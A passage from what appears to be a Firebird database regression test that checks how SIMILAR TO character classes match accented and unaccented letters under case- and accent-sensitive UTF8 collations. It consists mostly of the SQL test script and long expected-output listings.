S_LOWER_CS_AS 0 S_LOWER_CI_AS 0 S_UPPER_CI_AI 1 S_UPPER_CS_AS 0 S_UPPER_CI_AS 0 S_WHITE_SPACE 0 C à S_ALPHA_CI_AI 1 S_ALPHA_CS_AS 0 S_ALPHA_CI_AS 0 S_LOWER_CI_AI 1 S_LOWER_CS_AS 0 S_LOWER_CI_AS 0 S_UPPER_CI_AI 1 S_UPPER_CS_AS 0 S_UPPER_CI_AS 0 S_WHITE_SPACE 0 C è S_ALPHA_CI_AI 1 S_ALPHA_CS_AS 0 S_ALPHA_CI_AS 0 S_LOWER_CI_AI 1 S_LOWER_CS_AS 0 S_LOWER_CI_AS 0 S_UPPER_CI_AI 1 S_UPPER_CS_AS 0 S_UPPER_CI_AS 0 S_WHITE_SPACE 0 C ì S_ALPHA_CI_AI 1 S_ALPHA_CS_AS 0 S_ALPHA_CI_AS 0 S_LOWER_CI_AI 1 S_LOWER_CS_AS 0 S_LOWER_CI_AS 0 
S_UPPER_CI_AI 1 S_UPPER_CS_AS 0 S_UPPER_CI_AS 0 S_WHITE_SPACE 0 C ò S_ALPHA_CI_AI 1 S_ALPHA_CS_AS 0 S_ALPHA_CI_AS 0 S_LOWER_CI_AI 1 S_LOWER_CS_AS 0 S_LOWER_CI_AS 0 S_UPPER_CI_AI 1 S_UPPER_CS_AS 0 S_UPPER_CI_AS 0 S_WHITE_SPACE 0 C ù S_ALPHA_CI_AI 1 S_ALPHA_CS_AS 0 S_ALPHA_CI_AS 0 S_LOWER_CI_AI 1 S_LOWER_CS_AS 0 S_LOWER_CI_AS 0 S_UPPER_CI_AI 1 S_UPPER_CS_AS 0 S_UPPER_CI_AS 0 S_WHITE_SPACE 0 C â S_ALPHA_CI_AI 1 S_ALPHA_CS_AS 0 S_ALPHA_CI_AS 0 S_LOWER_CI_AI 1 S_LOWER_CS_AS 0 S_LOWER_CI_AS 0 S_UPPER_CI_AI 1 S_UPPER_CS_AS 0 S_UPPER_CI_AS 0 S_WHITE_SPACE 0 C ê S_ALPHA_CI_AI 1 S_ALPHA_CS_AS 0 S_ALPHA_CI_AS 0 S_LOWER_CI_AI 1 S_LOWER_CS_AS 0 S_LOWER_CI_AS 0 S_UPPER_CI_AI 1 S_UPPER_CS_AS 0 S_UPPER_CI_AS 0 S_WHITE_SPACE 0 C î S_ALPHA_CI_AI 1 S_ALPHA_CS_AS 0 S_ALPHA_CI_AS 0 S_LOWER_CI_AI 1 S_LOWER_CS_AS 0 S_LOWER_CI_AS 0 S_UPPER_CI_AI 1 S_UPPER_CS_AS 0 S_UPPER_CI_AS 0 S_WHITE_SPACE 0 C ô S_ALPHA_CI_AI 1 S_ALPHA_CS_AS 0 S_ALPHA_CI_AS 0 S_LOWER_CI_AI 1 S_LOWER_CS_AS 0 S_LOWER_CI_AS 0 S_UPPER_CI_AI 1 S_UPPER_CS_AS 0 S_UPPER_CI_AS 0 S_WHITE_SPACE 0 C û S_ALPHA_CI_AI 1 S_ALPHA_CS_AS 0 S_ALPHA_CI_AS 0 S_LOWER_CI_AI 1 S_LOWER_CS_AS 0 S_LOWER_CI_AS 0 S_UPPER_CI_AI 1 S_UPPER_CS_AS 0 S_UPPER_CI_AS 0 S_WHITE_SPACE 0 C ã S_ALPHA_CI_AI 1 S_ALPHA_CS_AS 0 S_ALPHA_CI_AS 0 S_LOWER_CI_AI 1 S_LOWER_CS_AS 0 S_LOWER_CI_AS 0 S_UPPER_CI_AI 1 S_UPPER_CS_AS 0 S_UPPER_CI_AS 0 S_WHITE_SPACE 0 C ñ S_ALPHA_CI_AI 1 S_ALPHA_CS_AS 0 S_ALPHA_CI_AS 0 S_LOWER_CI_AI 1 S_LOWER_CS_AS 0 S_LOWER_CI_AS 0 S_UPPER_CI_AI 1 S_UPPER_CS_AS 0 S_UPPER_CI_AS 0 S_WHITE_SPACE 0 C õ S_ALPHA_CI_AI 1 S_ALPHA_CS_AS 0 S_ALPHA_CI_AS 0 S_LOWER_CI_AI 1 S_LOWER_CS_AS 0 S_LOWER_CI_AS 0 S_UPPER_CI_AI 1 S_UPPER_CS_AS 0 S_UPPER_CI_AS 0 S_WHITE_SPACE 0 C ä S_ALPHA_CI_AI 1 S_ALPHA_CS_AS 0 S_ALPHA_CI_AS 0 S_LOWER_CI_AI 1 S_LOWER_CS_AS 0 S_LOWER_CI_AS 0 S_UPPER_CI_AI 1 S_UPPER_CS_AS 0 S_UPPER_CI_AS 0 S_WHITE_SPACE 0 C ë S_ALPHA_CI_AI 1 S_ALPHA_CS_AS 0 S_ALPHA_CI_AS 0 S_LOWER_CI_AI 1 S_LOWER_CS_AS 0 S_LOWER_CI_AS 0 S_UPPER_CI_AI 1 S_UPPER_CS_AS 0 S_UPPER_CI_AS 0 S_WHITE_SPACE 0 C ï S_ALPHA_CI_AI 1 S_ALPHA_CS_AS 0 S_ALPHA_CI_AS 0 S_LOWER_CI_AI 1 S_LOWER_CS_AS 0 S_LOWER_CI_AS 0 S_UPPER_CI_AI 1 S_UPPER_CS_AS 0 S_UPPER_CI_AS 0 S_WHITE_SPACE 0 C ö S_ALPHA_CI_AI 1 S_ALPHA_CS_AS 0 S_ALPHA_CI_AS 0 S_LOWER_CI_AI 1 S_LOWER_CS_AS 0 S_LOWER_CI_AS 0 S_UPPER_CI_AI 1 S_UPPER_CS_AS 0 S_UPPER_CI_AS 0 S_WHITE_SPACE 0 C ü S_ALPHA_CI_AI 1 S_ALPHA_CS_AS 0 S_ALPHA_CI_AS 0 S_LOWER_CI_AI 1 S_LOWER_CS_AS 0 S_LOWER_CI_AS 0 S_UPPER_CI_AI 1 S_UPPER_CS_AS 0 S_UPPER_CI_AS 0 S_WHITE_SPACE 0 C ÿ S_ALPHA_CI_AI 1 S_ALPHA_CS_AS 0 S_ALPHA_CI_AS 0 S_LOWER_CI_AI 1 S_LOWER_CS_AS 0 S_LOWER_CI_AS 0 S_UPPER_CI_AI 1 S_UPPER_CS_AS 0 S_UPPER_CI_AS 0 S_WHITE_SPACE 0 C ç S_ALPHA_CI_AI 1 S_ALPHA_CS_AS 0 S_ALPHA_CI_AS 0 S_LOWER_CI_AI 1 S_LOWER_CS_AS 0 S_LOWER_CI_AS 0 S_UPPER_CI_AI 1 S_UPPER_CS_AS 0 S_UPPER_CI_AS 0 S_WHITE_SPACE 0 C š S_ALPHA_CI_AI 1 S_ALPHA_CS_AS 0 S_ALPHA_CI_AS 0 S_LOWER_CI_AI 1 S_LOWER_CS_AS 0 S_LOWER_CI_AS 0 S_UPPER_CI_AI 1 S_UPPER_CS_AS 0 S_UPPER_CI_AS 0 S_WHITE_SPACE 0 C ą S_ALPHA_CI_AI 1 S_ALPHA_CS_AS 0 S_ALPHA_CI_AS 0 S_LOWER_CI_AI 1 S_LOWER_CS_AS 0 S_LOWER_CI_AS 0 S_UPPER_CI_AI 1 S_UPPER_CS_AS 0 S_UPPER_CI_AS 0 S_WHITE_SPACE 0 C ę S_ALPHA_CI_AI 1 S_ALPHA_CS_AS 0 S_ALPHA_CI_AS 0 S_LOWER_CI_AI 1 S_LOWER_CS_AS 0 S_LOWER_CI_AS 0 S_UPPER_CI_AI 1 S_UPPER_CS_AS 0 S_UPPER_CI_AS 0 S_WHITE_SPACE 0 C ź S_ALPHA_CI_AI 1 S_ALPHA_CS_AS 0 S_ALPHA_CI_AS 0 S_LOWER_CI_AI 1 S_LOWER_CS_AS 0 S_LOWER_CI_AS 0 S_UPPER_CI_AI 1 S_UPPER_CS_AS 0 S_UPPER_CI_AS 0 S_WHITE_SPACE 0 C ż S_ALPHA_CI_AI 1 S_ALPHA_CS_AS 0 
S_ALPHA_CI_AS 0 S_LOWER_CI_AI 1 S_LOWER_CS_AS 0 S_LOWER_CI_AS 0 S_UPPER_CI_AI 1 S_UPPER_CS_AS 0 S_UPPER_CI_AS 0 S_WHITE_SPACE 0 C ă S_ALPHA_CI_AI 1 S_ALPHA_CS_AS 0 S_ALPHA_CI_AS 0 S_LOWER_CI_AI 1 S_LOWER_CS_AS 0 S_LOWER_CI_AS 0 S_UPPER_CI_AI 1 S_UPPER_CS_AS 0 S_UPPER_CI_AS 0 S_WHITE_SPACE 0 C ş S_ALPHA_CI_AI 1 S_ALPHA_CS_AS 0 S_ALPHA_CI_AS 0 S_LOWER_CI_AI 1 S_LOWER_CS_AS 0 S_LOWER_CI_AS 0 S_UPPER_CI_AI 1 S_UPPER_CS_AS 0 S_UPPER_CI_AS 0 S_WHITE_SPACE 0 C ţ S_ALPHA_CI_AI 1 S_ALPHA_CS_AS 0 S_ALPHA_CI_AS 0 S_LOWER_CI_AI 1 S_LOWER_CS_AS 0 S_LOWER_CI_AS 0 S_UPPER_CI_AI 1 S_UPPER_CS_AS 0 S_UPPER_CI_AS 0 S_WHITE_SPACE 0 C Á S_ALPHA_CI_AI 1 S_ALPHA_CS_AS 0 S_ALPHA_CI_AS 0 S_LOWER_CI_AI 1 S_LOWER_CS_AS 0 S_LOWER_CI_AS 0 S_UPPER_CI_AI 1 S_UPPER_CS_AS 0 S_UPPER_CI_AS 0 S_WHITE_SPACE 0 C É S_ALPHA_CI_AI 1 S_ALPHA_CS_AS 0 S_ALPHA_CI_AS 0 S_LOWER_CI_AI 1 S_LOWER_CS_AS 0 S_LOWER_CI_AS 0 S_UPPER_CI_AI 1 S_UPPER_CS_AS 0 S_UPPER_CI_AS 0 S_WHITE_SPACE 0 C Í S_ALPHA_CI_AI 1 S_ALPHA_CS_AS 0 S_ALPHA_CI_AS 0 S_LOWER_CI_AI 1 S_LOWER_CS_AS 0 S_LOWER_CI_AS 0 S_UPPER_CI_AI 1 S_UPPER_CS_AS 0 S_UPPER_CI_AS 0 S_WHITE_SPACE 0 C Ó S_ALPHA_CI_AI 1 S_ALPHA_CS_AS 0 S_ALPHA_CI_AS 0 S_LOWER_CI_AI 1 S_LOWER_CS_AS 0 S_LOWER_CI_AS 0 S_UPPER_CI_AI 1 S_UPPER_CS_AS 0 S_UPPER_CI_AS 0 S_WHITE_SPACE 0 C Ú S_ALPHA_CI_AI 1 S_ALPHA_CS_AS 0 S_ALPHA_CI_AS 0 S_LOWER_CI_AI 1 S_LOWER_CS_AS 0 S_LOWER_CI_AS 0 S_UPPER_CI_AI 1 S_UPPER_CS_AS 0 S_UPPER_CI_AS 0 S_WHITE_SPACE 0 C Ý S_ALPHA_CI_AI 1 S_ALPHA_CS_AS 0 S_ALPHA_CI_AS 0 S_LOWER_CI_AI 1 S_LOWER_CS_AS 0 S_LOWER_CI_AS 0 S_UPPER_CI_AI 1 S_UPPER_CS_AS 0 S_UPPER_CI_AS 0 S_WHITE_SPACE 0 C À S_ALPHA_CI_AI 1 S_ALPHA_CS_AS 0 S_ALPHA_CI_AS 0 S_LOWER_CI_AI 1 S_LOWER_CS_AS 0 S_LOWER_CI_AS 0 S_UPPER_CI_AI 1 S_UPPER_CS_AS 0 S_UPPER_CI_AS 0 S_WHITE_SPACE 0 C È S_ALPHA_CI_AI 1 S_ALPHA_CS_AS 0 S_ALPHA_CI_AS 0 S_LOWER_CI_AI 1 S_LOWER_CS_AS 0 S_LOWER_CI_AS 0 S_UPPER_CI_AI 1 S_UPPER_CS_AS 0 S_UPPER_CI_AS 0 S_WHITE_SPACE 0 C Ì S_ALPHA_CI_AI 1 S_ALPHA_CS_AS 0 S_ALPHA_CI_AS 0 S_LOWER_CI_AI 1 S_LOWER_CS_AS 0 S_LOWER_CI_AS 0 S_UPPER_CI_AI 1 S_UPPER_CS_AS 0 S_UPPER_CI_AS 0 S_WHITE_SPACE 0 C Ò S_ALPHA_CI_AI 1 S_ALPHA_CS_AS 0 S_ALPHA_CI_AS 0 S_LOWER_CI_AI 1 S_LOWER_CS_AS 0 S_LOWER_CI_AS 0 S_UPPER_CI_AI 1 S_UPPER_CS_AS 0 S_UPPER_CI_AS 0 S_WHITE_SPACE 0 C Ù S_ALPHA_CI_AI 1 S_ALPHA_CS_AS 0 S_ALPHA_CI_AS 0 S_LOWER_CI_AI 1 S_LOWER_CS_AS 0 S_LOWER_CI_AS 0 S_UPPER_CI_AI 1 S_UPPER_CS_AS 0 S_UPPER_CI_AS 0 S_WHITE_SPACE 0 C Â S_ALPHA_CI_AI 1 S_ALPHA_CS_AS 0 S_ALPHA_CI_AS 0 S_LOWER_CI_AI 1 S_LOWER_CS_AS 0 S_LOWER_CI_AS 0 S_UPPER_CI_AI 1 S_UPPER_CS_AS 0 S_UPPER_CI_AS 0 S_WHITE_SPACE 0 C Ê S_ALPHA_CI_AI 1 S_ALPHA_CS_AS 0 S_ALPHA_CI_AS 0 S_LOWER_CI_AI 1 S_LOWER_CS_AS 0 S_LOWER_CI_AS 0 S_UPPER_CI_AI 1 S_UPPER_CS_AS 0 S_UPPER_CI_AS 0 S_WHITE_SPACE 0 C Î S_ALPHA_CI_AI 1 S_ALPHA_CS_AS 0 S_ALPHA_CI_AS 0 S_LOWER_CI_AI 1 S_LOWER_CS_AS 0 S_LOWER_CI_AS 0 S_UPPER_CI_AI 1 S_UPPER_CS_AS 0 S_UPPER_CI_AS 0 S_WHITE_SPACE 0 C Ô S_ALPHA_CI_AI 1 S_ALPHA_CS_AS 0 S_ALPHA_CI_AS 0 S_LOWER_CI_AI 1 S_LOWER_CS_AS 0 S_LOWER_CI_AS 0 S_UPPER_CI_AI 1 S_UPPER_CS_AS 0 S_UPPER_CI_AS 0 S_WHITE_SPACE 0 C Û S_ALPHA_CI_AI 1 S_ALPHA_CS_AS 0 S_ALPHA_CI_AS 0 S_LOWER_CI_AI 1 S_LOWER_CS_AS 0 S_LOWER_CI_AS 0 S_UPPER_CI_AI 1 S_UPPER_CS_AS 0 S_UPPER_CI_AS 0 S_WHITE_SPACE 0 C Ã S_ALPHA_CI_AI 1 S_ALPHA_CS_AS 0 S_ALPHA_CI_AS 0 S_LOWER_CI_AI 1 S_LOWER_CS_AS 0 S_LOWER_CI_AS 0 S_UPPER_CI_AI 1 S_UPPER_CS_AS 0 S_UPPER_CI_AS 0 S_WHITE_SPACE 0 C Ñ S_ALPHA_CI_AI 1 S_ALPHA_CS_AS 0 S_ALPHA_CI_AS 0 S_LOWER_CI_AI 1 S_LOWER_CS_AS 0 S_LOWER_CI_AS 0 S_UPPER_CI_AI 1 S_UPPER_CS_AS 0 S_UPPER_CI_AS 
0 S_WHITE_SPACE 0 C Õ S_ALPHA_CI_AI 1 S_ALPHA_CS_AS 0 S_ALPHA_CI_AS 0 S_LOWER_CI_AI 1 S_LOWER_CS_AS 0 S_LOWER_CI_AS 0 S_UPPER_CI_AI 1 S_UPPER_CS_AS 0 S_UPPER_CI_AS 0 S_WHITE_SPACE 0 C Ä S_ALPHA_CI_AI 1 S_ALPHA_CS_AS 0 S_ALPHA_CI_AS 0 S_LOWER_CI_AI 1 S_LOWER_CS_AS 0 S_LOWER_CI_AS 0 S_UPPER_CI_AI 1 S_UPPER_CS_AS 0 S_UPPER_CI_AS 0 S_WHITE_SPACE 0 C Ë S_ALPHA_CI_AI 1 S_ALPHA_CS_AS 0 S_ALPHA_CI_AS 0 S_LOWER_CI_AI 1 S_LOWER_CS_AS 0 S_LOWER_CI_AS 0 S_UPPER_CI_AI 1 S_UPPER_CS_AS 0 S_UPPER_CI_AS 0 S_WHITE_SPACE 0 C Ï S_ALPHA_CI_AI 1 S_ALPHA_CS_AS 0 S_ALPHA_CI_AS 0 S_LOWER_CI_AI 1 S_LOWER_CS_AS 0 S_LOWER_CI_AS 0 S_UPPER_CI_AI 1 S_UPPER_CS_AS 0 S_UPPER_CI_AS 0 S_WHITE_SPACE 0 C Ö S_ALPHA_CI_AI 1 S_ALPHA_CS_AS 0 S_ALPHA_CI_AS 0 S_LOWER_CI_AI 1 S_LOWER_CS_AS 0 S_LOWER_CI_AS 0 S_UPPER_CI_AI 1 S_UPPER_CS_AS 0 S_UPPER_CI_AS 0 S_WHITE_SPACE 0 C Ü S_ALPHA_CI_AI 1 S_ALPHA_CS_AS 0 S_ALPHA_CI_AS 0 S_LOWER_CI_AI 1 S_LOWER_CS_AS 0 S_LOWER_CI_AS 0 S_UPPER_CI_AI 1 S_UPPER_CS_AS 0 S_UPPER_CI_AS 0 S_WHITE_SPACE 0 C Ÿ S_ALPHA_CI_AI 1 S_ALPHA_CS_AS 0 S_ALPHA_CI_AS 0 S_LOWER_CI_AI 1 S_LOWER_CS_AS 0 S_LOWER_CI_AS 0 S_UPPER_CI_AI 1 S_UPPER_CS_AS 0 S_UPPER_CI_AS 0 S_WHITE_SPACE 0 C Ç S_ALPHA_CI_AI 1 S_ALPHA_CS_AS 0 S_ALPHA_CI_AS 0 S_LOWER_CI_AI 1 S_LOWER_CS_AS 0 S_LOWER_CI_AS 0 S_UPPER_CI_AI 1 S_UPPER_CS_AS 0 S_UPPER_CI_AS 0 S_WHITE_SPACE 0 C Š S_ALPHA_CI_AI 1 S_ALPHA_CS_AS 0 S_ALPHA_CI_AS 0 S_LOWER_CI_AI 1 S_LOWER_CS_AS 0 S_LOWER_CI_AS 0 S_UPPER_CI_AI 1 S_UPPER_CS_AS 0 S_UPPER_CI_AS 0 S_WHITE_SPACE 0 C Ą S_ALPHA_CI_AI 1 S_ALPHA_CS_AS 0 S_ALPHA_CI_AS 0 S_LOWER_CI_AI 1 S_LOWER_CS_AS 0 S_LOWER_CI_AS 0 S_UPPER_CI_AI 1 S_UPPER_CS_AS 0 S_UPPER_CI_AS 0 S_WHITE_SPACE 0 C Ę S_ALPHA_CI_AI 1 S_ALPHA_CS_AS 0 S_ALPHA_CI_AS 0 S_LOWER_CI_AI 1 S_LOWER_CS_AS 0 S_LOWER_CI_AS 0 S_UPPER_CI_AI 1 S_UPPER_CS_AS 0 S_UPPER_CI_AS 0 S_WHITE_SPACE 0 C Ź S_ALPHA_CI_AI 1 S_ALPHA_CS_AS 0 S_ALPHA_CI_AS 0 S_LOWER_CI_AI 1 S_LOWER_CS_AS 0 S_LOWER_CI_AS 0 S_UPPER_CI_AI 1 S_UPPER_CS_AS 0 S_UPPER_CI_AS 0 S_WHITE_SPACE 0 C Ż S_ALPHA_CI_AI 1 S_ALPHA_CS_AS 0 S_ALPHA_CI_AS 0 S_LOWER_CI_AI 1 S_LOWER_CS_AS 0 S_LOWER_CI_AS 0 S_UPPER_CI_AI 1 S_UPPER_CS_AS 0 S_UPPER_CI_AS 0 S_WHITE_SPACE 0 C Ă S_ALPHA_CI_AI 1 S_ALPHA_CS_AS 0 S_ALPHA_CI_AS 0 S_LOWER_CI_AI 1 S_LOWER_CS_AS 0 S_LOWER_CI_AS 0 S_UPPER_CI_AI 1 S_UPPER_CS_AS 0 S_UPPER_CI_AS 0 S_WHITE_SPACE 0 C Ş S_ALPHA_CI_AI 1 S_ALPHA_CS_AS 0 S_ALPHA_CI_AS 0 S_LOWER_CI_AI 1 S_LOWER_CS_AS 0 S_LOWER_CI_AS 0 S_UPPER_CI_AI 1 S_UPPER_CS_AS 0 S_UPPER_CI_AS 0 S_WHITE_SPACE 0 C Ţ S_ALPHA_CI_AI 1 S_ALPHA_CS_AS 0 S_ALPHA_CI_AS 0 S_LOWER_CI_AI 1 S_LOWER_CS_AS 0 S_LOWER_CI_AS 0 S_UPPER_CI_AI 1 S_UPPER_CS_AS 0 S_UPPER_CI_AS 0 S_WHITE_SPACE 0 C S_ALPHA_CI_AI 0 S_ALPHA_CS_AS 0 S_ALPHA_CI_AS 0 S_LOWER_CI_AI 0 S_LOWER_CS_AS 0 S_LOWER_CI_AS 0 S_UPPER_CI_AI 0 S_UPPER_CS_AS 0 S_UPPER_CI_AS 0 S_WHITE_SPACE 1 C S_ALPHA_CI_AI 0 S_ALPHA_CS_AS 0 S_ALPHA_CI_AS 0 S_LOWER_CI_AI 0 S_LOWER_CS_AS 0 S_LOWER_CI_AS 0 S_UPPER_CI_AI 0 S_UPPER_CS_AS 0 S_UPPER_CI_AS 0 S_WHITE_SPACE 1 C \\w S_ALPHA_CI_AI 0 S_ALPHA_CS_AS 0 S_ALPHA_CI_AS 0 S_LOWER_CI_AI 0 S_LOWER_CS_AS 0 S_LOWER_CI_AS 0 S_UPPER_CI_AI 0 S_UPPER_CS_AS 0 S_UPPER_CI_AS 0 S_WHITE_SPACE 1 """ @pytest.mark.version('>=3.0,<4.0') def test_1(act_1: Action): act_1.expected_stdout = expected_stdout_1 act_1.execute() assert act_1.clean_stdout == act_1.clean_expected_stdout # version: 4.0 # resources: None substitutions_2 = [] init_script_2 = """""" db_2 = db_factory(charset='UTF8', sql_dialect=3, init=init_script_2) test_script_2 = """ -- NOTE: -- 1. 
This test can NOT be applied on 2.5 because of error: -- Statement failed, SQLSTATE = 42000 -- Invalid SIMILAR TO pattern -- 2. Added four characters: 'Ø' 'Ð' 'Ł' and 'Ŀ' - because of fixed CORE-4739 set term ^; execute block as begin begin execute statement 'drop collation co_utf8_ci_ai'; when any do begin end end begin execute statement 'drop collation co_utf8_cs_as'; when any do begin end end begin execute statement 'drop collation co_utf8_ci_as'; when any do begin end end end ^ set term ;^ commit; create collation co_utf8_ci_ai for utf8 from unicode case insensitive accent insensitive; create collation co_utf8_cs_as for utf8 from unicode case sensitive accent sensitive; create collation co_utf8_ci_as for utf8 from unicode case insensitive accent sensitive; commit; set list on; with recursive d as ( select cast('aeiouyAEIOUYáéíóúýàèìòùâêîôûãñõäëïöüÿçšąęźżăşţÁÉÍÓÚÝÀÈÌÒÙÂÊÎÔÛÃÑÕÄËÏÖÜŸÇŠĄĘŹŻĂŞŢ' || ascii_char(9) || ascii_char(10) || ascii_char(32) || 'øðłŀØÐŁĿ' -- added 14.10.2019 as varchar(100) character set utf8 ) s from rdb$database ) ,r as(select 1 i from rdb$database union all select r.i+1 from r where r.i < 100) ,e as( select substring(d.s from r.i for 1) c from d join r on r.i <= char_length(d.s) ) select decode( e.c, ascii_char(9),' ', ascii_char(10),' ', ascii_char(32), '\\w', e.c ) c -- ALPHA Latin letters a..z and A..Z. With an accent-insensitive collation, -- this class also matches accented forms of these characters. ,iif( e.c collate co_utf8_ci_ai similar to '[[:aLPHA:]]', 1, 0 ) s_alpha_ci_ai ,iif( e.c collate co_utf8_cs_as similar to '[[:aLPHA:]]', 1, 0 ) s_alpha_cs_as ,iif( e.c collate co_utf8_ci_as similar to '[[:aLPHA:]]', 1, 0 ) s_alpha_ci_as -- [:LOWER:] Lowercase Latin letters a..z. Also matches uppercase with case-insensitive -- collation and accented forms with accent-insensitive collation. ,iif( e.c collate co_utf8_ci_ai similar to '[[:LoWer:]]', 1, 0 ) s_lower_ci_ai ,iif( e.c collate co_utf8_cs_as similar to '[[:lOwEr:]]', 1, 0 ) s_lower_cs_as ,iif( e.c collate co_utf8_ci_as similar to '[[:lowER:]]', 1, 0 ) s_lower_ci_as -- [:UPPER:] Uppercase Latin letters A..Z. Also matches lowercase with case-insensitive -- collation and accented forms with accent-insensitive collation. ,iif( e.c collate co_utf8_ci_ai similar to '[[:uPPer:]]', 1, 0 ) s_upper_ci_ai ,iif( e.c collate co_utf8_cs_as similar to '[[:uPpeR:]]', 1, 0 ) s_upper_cs_as ,iif( e.c collate co_utf8_ci_as similar to '[[:UpPeR:]]', 1, 0 ) s_upper_ci_as -- [:WHITESPACE:] Matches vertical tab (ASCII 9), linefeed (ASCII 10), horizontal -- tab (ASCII 11), formfeed (ASCII 12), carriage return (ASCII 13) and space (ASCII 32). 
,iif( e.c similar to '[[:WhiTespacE:]]', 1, 0 ) s_white_space from e ; """ act_2 = isql_act('db_2', test_script_2, substitutions=substitutions_2) expected_stdout_2 = """ C a S_ALPHA_CI_AI 1 S_ALPHA_CS_AS 1 S_ALPHA_CI_AS 1 S_LOWER_CI_AI 1 S_LOWER_CS_AS 1 S_LOWER_CI_AS 1 S_UPPER_CI_AI 1 S_UPPER_CS_AS 0 S_UPPER_CI_AS 1 S_WHITE_SPACE 0 C e S_ALPHA_CI_AI 1 S_ALPHA_CS_AS 1 S_ALPHA_CI_AS 1 S_LOWER_CI_AI 1 S_LOWER_CS_AS 1 S_LOWER_CI_AS 1 S_UPPER_CI_AI 1 S_UPPER_CS_AS 0 S_UPPER_CI_AS 1 S_WHITE_SPACE 0 C i S_ALPHA_CI_AI 1 S_ALPHA_CS_AS 1 S_ALPHA_CI_AS 1 S_LOWER_CI_AI 1 S_LOWER_CS_AS 1 S_LOWER_CI_AS 1 S_UPPER_CI_AI 1 S_UPPER_CS_AS 0 S_UPPER_CI_AS 1 S_WHITE_SPACE 0 C o S_ALPHA_CI_AI 1 S_ALPHA_CS_AS 1 S_ALPHA_CI_AS 1 S_LOWER_CI_AI 1 S_LOWER_CS_AS 1 S_LOWER_CI_AS 1 S_UPPER_CI_AI 1 S_UPPER_CS_AS 0 S_UPPER_CI_AS 1 S_WHITE_SPACE 0 C u S_ALPHA_CI_AI 1 S_ALPHA_CS_AS 1 S_ALPHA_CI_AS 1 S_LOWER_CI_AI 1 S_LOWER_CS_AS 1 S_LOWER_CI_AS 1 S_UPPER_CI_AI 1 S_UPPER_CS_AS 0 S_UPPER_CI_AS 1 S_WHITE_SPACE 0 C y S_ALPHA_CI_AI 1 S_ALPHA_CS_AS 1 S_ALPHA_CI_AS 1 S_LOWER_CI_AI 1 S_LOWER_CS_AS 1 S_LOWER_CI_AS 1 S_UPPER_CI_AI 1 S_UPPER_CS_AS 0 S_UPPER_CI_AS 1 S_WHITE_SPACE 0 C A S_ALPHA_CI_AI 1 S_ALPHA_CS_AS 1 S_ALPHA_CI_AS 1 S_LOWER_CI_AI 1 S_LOWER_CS_AS 0 S_LOWER_CI_AS 1 S_UPPER_CI_AI 1 S_UPPER_CS_AS 1 S_UPPER_CI_AS 1 S_WHITE_SPACE 0 C E S_ALPHA_CI_AI 1 S_ALPHA_CS_AS 1 S_ALPHA_CI_AS 1 S_LOWER_CI_AI 1 S_LOWER_CS_AS 0 S_LOWER_CI_AS 1 S_UPPER_CI_AI 1 S_UPPER_CS_AS 1 S_UPPER_CI_AS 1 S_WHITE_SPACE 0 C I S_ALPHA_CI_AI 1 S_ALPHA_CS_AS 1 S_ALPHA_CI_AS 1 S_LOWER_CI_AI 1 S_LOWER_CS_AS 0 S_LOWER_CI_AS 1 S_UPPER_CI_AI 1 S_UPPER_CS_AS 1 S_UPPER_CI_AS 1 S_WHITE_SPACE 0 C O S_ALPHA_CI_AI 1 S_ALPHA_CS_AS 1 S_ALPHA_CI_AS 1 S_LOWER_CI_AI 1 S_LOWER_CS_AS 0 S_LOWER_CI_AS 1 S_UPPER_CI_AI 1 S_UPPER_CS_AS 1 S_UPPER_CI_AS 1 S_WHITE_SPACE 0 C U S_ALPHA_CI_AI 1 S_ALPHA_CS_AS 1 S_ALPHA_CI_AS 1 S_LOWER_CI_AI 1 S_LOWER_CS_AS 0 S_LOWER_CI_AS 1 S_UPPER_CI_AI 1 S_UPPER_CS_AS 1 S_UPPER_CI_AS 1 S_WHITE_SPACE 0 C Y S_ALPHA_CI_AI 1 S_ALPHA_CS_AS 1 S_ALPHA_CI_AS 1 S_LOWER_CI_AI 1 S_LOWER_CS_AS 0 S_LOWER_CI_AS 1 S_UPPER_CI_AI 1 S_UPPER_CS_AS 1 S_UPPER_CI_AS 1 S_WHITE_SPACE 0 C á S_ALPHA_CI_AI 1 S_ALPHA_CS_AS 0 S_ALPHA_CI_AS 0 S_LOWER_CI_AI 1 S_LOWER_CS_AS 0 S_LOWER_CI_AS 0 S_UPPER_CI_AI 1 S_UPPER_CS_AS 0 S_UPPER_CI_AS 0 S_WHITE_SPACE 0 C é S_ALPHA_CI_AI 1 S_ALPHA_CS_AS 0 S_ALPHA_CI_AS 0 S_LOWER_CI_AI 1 S_LOWER_CS_AS 0 S_LOWER_CI_AS 0 S_UPPER_CI_AI 1 S_UPPER_CS_AS 0 S_UPPER_CI_AS 0 S_WHITE_SPACE 0 C í S_ALPHA_CI_AI 1 S_ALPHA_CS_AS 0 S_ALPHA_CI_AS 0 S_LOWER_CI_AI 1 S_LOWER_CS_AS 0 S_LOWER_CI_AS 0 S_UPPER_CI_AI 1 S_UPPER_CS_AS 0 S_UPPER_CI_AS 0 S_WHITE_SPACE 0 C ó S_ALPHA_CI_AI 1 S_ALPHA_CS_AS 0 S_ALPHA_CI_AS 0 S_LOWER_CI_AI 1 S_LOWER_CS_AS 0 S_LOWER_CI_AS 0 S_UPPER_CI_AI 1 S_UPPER_CS_AS 0 S_UPPER_CI_AS 0 S_WHITE_SPACE 0 C ú S_ALPHA_CI_AI 1 S_ALPHA_CS_AS 0 S_ALPHA_CI_AS 0 S_LOWER_CI_AI 1 S_LOWER_CS_AS 0 S_LOWER_CI_AS 0 S_UPPER_CI_AI 1 S_UPPER_CS_AS 0 S_UPPER_CI_AS 0 S_WHITE_SPACE 0 C ý S_ALPHA_CI_AI 1 S_ALPHA_CS_AS 0 S_ALPHA_CI_AS 0 S_LOWER_CI_AI 1 S_LOWER_CS_AS 0 S_LOWER_CI_AS 0 S_UPPER_CI_AI 1 S_UPPER_CS_AS 0 S_UPPER_CI_AS 0 S_WHITE_SPACE 0 C à S_ALPHA_CI_AI 1 S_ALPHA_CS_AS 0 S_ALPHA_CI_AS 0 S_LOWER_CI_AI 1 S_LOWER_CS_AS 0 S_LOWER_CI_AS 0 S_UPPER_CI_AI 1 S_UPPER_CS_AS 0 S_UPPER_CI_AS 0 S_WHITE_SPACE 0 C è S_ALPHA_CI_AI 1 S_ALPHA_CS_AS 0 S_ALPHA_CI_AS 0 S_LOWER_CI_AI 1 S_LOWER_CS_AS 0 S_LOWER_CI_AS 0 S_UPPER_CI_AI 1 S_UPPER_CS_AS 0 S_UPPER_CI_AS 0 S_WHITE_SPACE 0 C ì S_ALPHA_CI_AI 1 S_ALPHA_CS_AS 0 S_ALPHA_CI_AS 0 